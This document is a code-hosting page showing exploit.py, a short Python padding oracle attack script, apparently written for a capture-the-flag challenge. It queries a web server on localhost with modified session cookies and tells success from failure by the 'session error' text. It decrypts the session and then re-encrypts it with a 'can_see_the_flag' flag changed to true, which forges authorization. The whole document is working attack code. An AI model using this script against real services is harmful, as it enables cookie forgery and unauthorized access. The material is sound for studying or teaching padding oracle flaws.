-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathexploit.py
27 lines (20 loc) · 1.09 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
from padding_oracle import encrypt, decrypt, base64_encode, base64_decode, urlencode, urldecode
import requests
session = 'ZhGw1aD3RzOX%2FliA7Qu1%2FMOqr%2Fa6jB2fN1Cj09yRwfPJkgUEZnhkpmpq5FenYBQLeyED%2BnY1DH0qPkvjcyhIqMjrYVagGRl6OaXs5cwCH2s%3D' # target this
# define the oracle
sess = requests.Session() # connection pooling
def oracle(ciphertext: bytes) -> bool:
resp = sess.get('http://localhost:8887', cookies={'session': base64_encode(ciphertext)})
#print(resp.status_code, resp.text) # let's see what can be a condition
return 'session error' not in resp.text
ciphertext = base64_decode(urldecode(session))
print(ciphertext, len(ciphertext))
block_size = 16
decrypted = decrypt(ciphertext, block_size, oracle, num_threads=64)
print(decrypted)
decrypted = b'a:2:{s:4:"name";s:6:"djosix";s:16:"can_see_the_flag";b:0;}\x06\x06\x06\x06\x06\x06'
modified = b'a:2:{s:4:"name";s:6:"djosix";s:16:"can_see_the_flag";b:1;}' # set can_see_the_flag to 1
encrypted = encrypt(modified, block_size, oracle, 64)
print(encrypted)
print(base64_encode(encrypted))
print(urlencode(base64_encode(encrypted)))